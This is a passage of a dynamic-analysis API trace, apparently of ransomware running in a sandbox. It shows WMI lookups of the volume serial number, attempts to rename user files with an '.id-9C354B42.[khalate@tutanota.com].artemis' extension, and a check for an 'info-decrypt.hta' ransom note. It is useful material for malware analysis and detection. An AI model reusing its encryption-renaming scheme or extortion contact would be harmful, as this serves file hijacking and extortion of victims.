pCtx=0x0, ppObject=0x71ef1a4*=0x0, ppCallResult=0x0 | out: ppObject=0x71ef1a4*=0x673c2c0, ppCallResult=0x0) returned 0x0 [0179.528] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6734060, puCount=0x71ef1a4 | out: puCount=0x71ef1a4*=0x2) returned 0x0 [0179.528] WbemDefPath:IWbemPath:GetText (in: This=0x6734060, lFlags=4, puBuffLength=0x71ef1a0*=0x0, pszText=0x0 | out: puBuffLength=0x71ef1a0*=0xf, pszText=0x0) returned 0x0 [0179.528] WbemDefPath:IWbemPath:GetText (in: This=0x6734060, lFlags=4, puBuffLength=0x71ef1a0*=0xf, pszText="00000000000000" | out: puBuffLength=0x71ef1a0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0179.528] IWbemClassObject:Get (in: This=0x673c2c0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x71ef1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3905928*=0, plFlavor=0x390592c*=0 | out: pVal=0x71ef1a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3905928*=8, plFlavor=0x390592c*=0) returned 0x0 [0179.528] SysStringByteLen (bstr="9C354B42") returned 0x10 [0179.528] SysStringByteLen (bstr="9C354B42") returned 0x10 [0179.528] IWbemClassObject:Get (in: This=0x673c2c0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x71ef1a8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3905928*=8, plFlavor=0x390592c*=0 | out: pVal=0x71ef1a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3905928*=8, plFlavor=0x390592c*=0) returned 0x0 [0179.528] SysStringByteLen (bstr="9C354B42") returned 0x10 [0179.528] SysStringByteLen (bstr="9C354B42") returned 0x10 [0179.529] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", nBufferLength=0x105, lpBuffer=0x71eeda8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpFilePart=0x0) returned 0x55 [0179.529] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x71eeda8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x80 [0179.529] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef208) returned 1 [0179.529] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), fInfoLevelId=0x0, lpFileInformation=0x71ef284 | out: lpFileInformation=0x71ef284*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000)) returned 1 [0179.529] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef204) returned 1 [0179.529] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf.id-9c354b42.[khalate@tutanota.com].artemis")) returned 0 [0179.530] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", nBufferLength=0x105, lpBuffer=0x71eee4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpFilePart=0x0) returned 0x7a [0179.530] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", nBufferLength=0x105, lpBuffer=0x71eee44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpFilePart=0x0) returned 0x7a [0179.530] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x71eee4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\info-decrypt.hta", lpFilePart=0x0) returned 0x2e [0179.531] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef2ac) returned 1 [0179.531] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x71ef328 | out: lpFileInformation=0x71ef328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62089c0, ftCreationTime.dwHighDateTime=0x1d6a20b, ftLastAccessTime.dwLowDateTime=0x62089c0, ftLastAccessTime.dwHighDateTime=0x1d6a20b, ftLastWriteTime.dwLowDateTime=0x622eb20, ftLastWriteTime.dwHighDateTime=0x1d6a20b, nFileSizeHigh=0x0, nFileSizeLow=0x1557)) returned 1 [0179.531] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef2a8) returned 1 [0179.531] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", nBufferLength=0x105, lpBuffer=0x71eedc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpFilePart=0x0) returned 0x7a [0179.531] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef274) returned 1 [0179.531] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), fInfoLevelId=0x0, lpFileInformation=0x39063e4 | out: lpFileInformation=0x39063e4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0179.531] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef270) returned 1 [0179.531] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", nBufferLength=0x105, lpBuffer=0x71eecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpFilePart=0x0) returned 0x7a [0179.531] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef1a8) returned 1 [0179.531] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0179.532] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71edfe0) returned 1 [0179.533] CoTaskMemAlloc (cb=0x20c) returned 0x6f2ec08 [0179.533] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x6f2ec08 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0179.533] CoTaskMemFree (pv=0x6f2ec08) [0179.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x71eec88, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0179.533] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71ef1d0 | out: ppv=0x71ef1d0*=0x72015c) returned 0x0 [0179.533] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x71ef1c8 | out: pAptType=0x71ef1c8*=1) returned 0x0 [0179.533] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x71ef1cc | out: ppvObject=0x71ef1cc*=0x0) returned 0x80004002 [0179.533] IUnknown:Release (This=0x72015c) returned 0x1 [0179.534] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71eeb38 | out: ppv=0x71eeb38*=0x67373b0) returned 0x0 [0179.534] WbemDefPath:IUnknown:QueryInterface (in: This=0x67373b0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71eed50 | out: ppvObject=0x71eed50*=0x0) returned 0x80004002 [0179.534] WbemDefPath:IClassFactory:CreateInstance (in: This=0x67373b0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eed64 | out: ppvObject=0x71eed64*=0x67341b0) returned 0x0 [0179.534] WbemDefPath:IUnknown:Release (This=0x67373b0) returned 0x0 [0179.534] WbemDefPath:IUnknown:QueryInterface (in: This=0x67341b0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee984 | out: ppvObject=0x71ee984*=0x67341b0) returned 0x0 [0179.534] WbemDefPath:IUnknown:QueryInterface (in: This=0x67341b0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71ee940 | out: ppvObject=0x71ee940*=0x0) returned 0x80004002 [0179.534] WbemDefPath:IUnknown:AddRef (This=0x67341b0) returned 0x3 [0179.534] WbemDefPath:IUnknown:QueryInterface (in: This=0x67341b0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee29c | out: ppvObject=0x71ee29c*=0x0) returned 0x80004002 [0179.534] WbemDefPath:IUnknown:QueryInterface (in: This=0x67341b0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee24c | out: ppvObject=0x71ee24c*=0x0) returned 0x80004002 [0179.535] WbemDefPath:IUnknown:QueryInterface (in: This=0x67341b0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee258 | out: ppvObject=0x71ee258*=0x9820de8) returned 0x0 [0179.535] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x9820de8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x71ee260 | out: pCid=0x71ee260*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0179.535] WbemDefPath:IUnknown:Release (This=0x9820de8) returned 0x3 [0179.535] CoGetContextToken (in: pToken=0x71ee2b8 | out: pToken=0x71ee2b8) returned 0x0 [0179.535] CoGetContextToken (in: pToken=0x71ee6c0 | out: pToken=0x71ee6c0) returned 0x0 [0179.535] WbemDefPath:IUnknown:QueryInterface (in: This=0x67341b0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee750 | out: ppvObject=0x71ee750*=0x0) returned 0x80004002 [0179.535] WbemDefPath:IUnknown:Release (This=0x67341b0) returned 0x2 [0179.535] WbemDefPath:IUnknown:Release (This=0x67341b0) returned 0x1 [0179.535] CoGetContextToken (in: pToken=0x71ef048 | out: pToken=0x71ef048) returned 0x0 [0179.535] CoGetContextToken (in: pToken=0x71eefa8 | out: pToken=0x71eefa8) returned 0x0 [0179.535] WbemDefPath:IUnknown:QueryInterface (in: This=0x67341b0, riid=0x71ef078*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x71ef074 | out: ppvObject=0x71ef074*=0x67341b0) returned 0x0 [0179.535] WbemDefPath:IUnknown:AddRef (This=0x67341b0) returned 0x3 [0179.535] WbemDefPath:IUnknown:Release (This=0x67341b0) returned 0x2 [0179.535] WbemDefPath:IWbemPath:SetText (This=0x67341b0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0179.535] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67341b0, puCount=0x71ef1fc | out: puCount=0x71ef1fc*=0x0) returned 0x0 [0179.535] WbemDefPath:IWbemPath:GetText (in: This=0x67341b0, lFlags=2, puBuffLength=0x71ef1f8*=0x0, pszText=0x0 | out: puBuffLength=0x71ef1f8*=0x20, pszText=0x0) returned 0x0 [0179.535] WbemDefPath:IWbemPath:GetText (in: This=0x67341b0, lFlags=2, puBuffLength=0x71ef1f8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x71ef1f8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0179.535] WbemDefPath:IWbemPath:GetInfo (in: This=0x67341b0, uRequestedInfo=0x0, puResponse=0x71ef204 | out: puResponse=0x71ef204*=0xc19) returned 0x0 [0179.535] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67341b0, puCount=0x71ef1fc | out: puCount=0x71ef1fc*=0x0) returned 0x0 [0179.535] WbemDefPath:IWbemPath:GetInfo (in: This=0x67341b0, uRequestedInfo=0x0, puResponse=0x71ef204 | out: puResponse=0x71ef204*=0xc19) returned 0x0 [0179.535] WbemDefPath:IWbemPath:GetInfo (in: This=0x67341b0, uRequestedInfo=0x0, puResponse=0x71ef204 | out: puResponse=0x71ef204*=0xc19) returned 0x0 [0179.535] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67341b0, puCount=0x71ef17c | out: puCount=0x71ef17c*=0x0) returned 0x0 [0179.535] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x71ef168 | out: puCount=0x71ef168*=0x2) returned 0x0 [0179.535] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x71ef164*=0x0, pszText=0x0 | out: puBuffLength=0x71ef164*=0xf, pszText=0x0) returned 0x0 [0179.535] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x71ef164*=0xf, pszText="00000000000000" | out: puBuffLength=0x71ef164*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0179.535] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71ef118 | out: ppv=0x71ef118*=0x72015c) returned 0x0 [0179.536] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x71ef110 | out: pAptType=0x71ef110*=1) returned 0x0 [0179.536] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x71ef114 | out: ppvObject=0x71ef114*=0x0) returned 0x80004002 [0179.536] IUnknown:Release (This=0x72015c) returned 0x1 [0179.536] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71eea80 | out: ppv=0x71eea80*=0x6737440) returned 0x0 [0179.537] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737440, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71eec98 | out: ppvObject=0x71eec98*=0x0) returned 0x80004002 [0179.537] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6737440, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eecac | out: ppvObject=0x71eecac*=0x6734220) returned 0x0 [0179.537] WbemDefPath:IUnknown:Release (This=0x6737440) returned 0x0 [0179.537] WbemDefPath:IUnknown:QueryInterface (in: This=0x6734220, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee8cc | out: ppvObject=0x71ee8cc*=0x6734220) returned 0x0 [0179.537] WbemDefPath:IUnknown:QueryInterface (in: This=0x6734220, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71ee888 | out: ppvObject=0x71ee888*=0x0) returned 0x80004002 [0179.537] WbemDefPath:IUnknown:AddRef (This=0x6734220) returned 0x3 [0179.537] WbemDefPath:IUnknown:QueryInterface (in: This=0x6734220, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee1e4 | out: ppvObject=0x71ee1e4*=0x0) returned 0x80004002 [0179.537] WbemDefPath:IUnknown:QueryInterface (in: This=0x6734220, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee194 | out: ppvObject=0x71ee194*=0x0) returned 0x80004002 [0179.537] WbemDefPath:IUnknown:QueryInterface (in: This=0x6734220, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee1a0 | out: ppvObject=0x71ee1a0*=0x9820e08) returned 0x0 [0179.537] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x9820e08, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x71ee1a8 | out: pCid=0x71ee1a8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0179.537] WbemDefPath:IUnknown:Release (This=0x9820e08) returned 0x3 [0179.537] CoGetContextToken (in: pToken=0x71ee200 | out: pToken=0x71ee200) returned 0x0 [0179.538] CoGetContextToken (in: pToken=0x71ee608 | out: pToken=0x71ee608) returned 0x0 [0179.538] WbemDefPath:IUnknown:QueryInterface (in: This=0x6734220, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee698 | out: ppvObject=0x71ee698*=0x0) returned 0x80004002 [0179.538] WbemDefPath:IUnknown:Release (This=0x6734220) returned 0x2 [0179.538] WbemDefPath:IUnknown:Release (This=0x6734220) returned 0x1 [0179.538] CoGetContextToken (in: pToken=0x71eef90 | out: pToken=0x71eef90) returned 0x0 [0179.538] CoGetContextToken (in: pToken=0x71eeef0 | out: pToken=0x71eeef0) returned 0x0 [0179.538] WbemDefPath:IUnknown:QueryInterface (in: This=0x6734220, riid=0x71eefc0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x71eefbc | out: ppvObject=0x71eefbc*=0x6734220) returned 0x0 [0179.538] WbemDefPath:IUnknown:AddRef (This=0x6734220) returned 0x3 [0179.538] WbemDefPath:IUnknown:Release (This=0x6734220) returned 0x2 [0179.538] WbemDefPath:IWbemPath:SetText (This=0x6734220, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0179.538] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6734220, puCount=0x71ef140 | out: puCount=0x71ef140*=0x2) returned 0x0 [0179.538] WbemDefPath:IWbemPath:GetText (in: This=0x6734220, lFlags=4, puBuffLength=0x71ef13c*=0x0, pszText=0x0 | out: puBuffLength=0x71ef13c*=0xf, pszText=0x0) returned 0x0 [0179.538] WbemDefPath:IWbemPath:GetText (in: This=0x6734220, lFlags=4, puBuffLength=0x71ef13c*=0xf, pszText="00000000000000" | out: puBuffLength=0x71ef13c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0179.538] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71ef140 | out: ppv=0x71ef140*=0x72015c) returned 0x0 [0179.538] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x71ef138 | out: pAptType=0x71ef138*=1) returned 0x0 [0179.538] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x71ef13c | out: ppvObject=0x71ef13c*=0x0) returned 0x80004002 [0179.538] IUnknown:Release (This=0x72015c) returned 0x1 [0179.539] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71eed60 | out: ppv=0x71eed60*=0x673d360) returned 0x0 [0179.539] WbemLocator:IUnknown:QueryInterface (in: This=0x673d360, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71eef78 | out: ppvObject=0x71eef78*=0x0) returned 0x80004002 [0179.539] WbemLocator:IClassFactory:CreateInstance (in: This=0x673d360, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eef8c | out: ppvObject=0x71eef8c*=0x6737450) returned 0x0 [0179.539] WbemLocator:IUnknown:Release (This=0x673d360) returned 0x0 [0179.539] WbemLocator:IUnknown:QueryInterface (in: This=0x6737450, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eebac | out: ppvObject=0x71eebac*=0x6737450) returned 0x0 [0179.539] WbemLocator:IUnknown:QueryInterface (in: This=0x6737450, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, 